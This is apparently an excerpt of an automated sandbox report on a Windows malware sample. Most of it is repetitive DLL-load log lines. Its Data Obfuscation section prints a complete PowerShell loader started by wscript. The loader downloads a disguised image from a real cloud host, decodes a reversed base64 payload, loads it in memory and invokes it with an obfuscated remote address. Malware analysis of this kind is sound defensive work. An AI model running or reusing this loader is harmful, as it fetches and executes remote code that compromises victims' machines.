            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
            Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
            Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
            Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
            Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
            Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
            Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
            Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
            Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
            Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
            Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
            Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
            Source: Binary string: aspnet_compiler.pdb | source: uahuajd, 0000000D.00000000.1710544109.00000000000F2000.00000002.00000001.01000000.00000007.sdmp, uahuajd.12.dr

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTabl", "0", "false");
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,14_2_00A02198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_0040134A pushfd ; retf 11_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004012F2 pushfd ; retf 11_2_004012F3
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_3_05B59721 push eax; ret 14_3_05B5972D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_3_05B59740 pushad ; retf 14_3_05B59F51
            Source: C:\Windows\explorer.exe | Code function: 16_2_009BA055 push es; iretd 16_2_009BA05D
            Source: C:\Windows\explorer.exe | Code function: 16_2_009B1405 push esi; ret 16_2_009B1407
            Source: C:\Windows\explorer.exe | Code function: 16_2_009B47A7 push esp; iretd 16_2_009B47A8
            Source: C:\Windows\explorer.exe | Code function: 16_2_009B14D4 push esi; ret 16_2_009B14D6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_008094E6 push edx; ret 17_2_008094E7
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0080967E push ds; retf 17_2_00809680
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_008038A7 push esp; iretd 17_2_008038A8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001687CE push es; ret 18_2_00168A18
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_00168EEF push edi; ret 18_2_00168EF0
            Source: C:\Windows\explorer.exe | Code function: 19_2_009E14D4 push esi; ret 19_2_009E14D6
            Source: C:\Windows\explorer.exe | Code function: 19_2_009E1405 push esi; ret 19_2_009E1407
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_00863417 push esp; iretd 20_2_00863418
            Source: C:\Windows\explorer.exe | Code function: 24_2_009E1405 push esi; ret 24_2_009E1407
            Source: C:\Windows\explorer.exe | Code function: 24_2_009E45A7 push esp; iretd 24_2_009E45A8
            Source: C:\Windows\explorer.exe | Code function: 24_2_009E14D4 push esi; ret 24_2_009E14D6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B3627 push esp; iretd 26_2_001B3628
            Source: C:\Windows\explorer.exe | Code function: 27_2_009D4817 push esp; iretd 27_2_009D4818
            Source: C:\Windows\explorer.exe | Code function: 27_2_009D1405 push esi; ret 27_2_009D1407
            Source: C:\Windows\explorer.exe | Code function: 27_2_009D14D4 push esi; ret 27_2_009D14D6
            Source: C:\Windows\explorer.exe | Code function: 27_2_009DAAD2 push ebp; iretd 27_2_009DAAD3
            Source: C:\Windows\explorer.exe | Code function: 27_2_009DAC8D push esp; iretd 27_2_009DAC95
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\uahuajd
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\uahuajd

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uahuajd:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00163862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,18_2_00163862
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
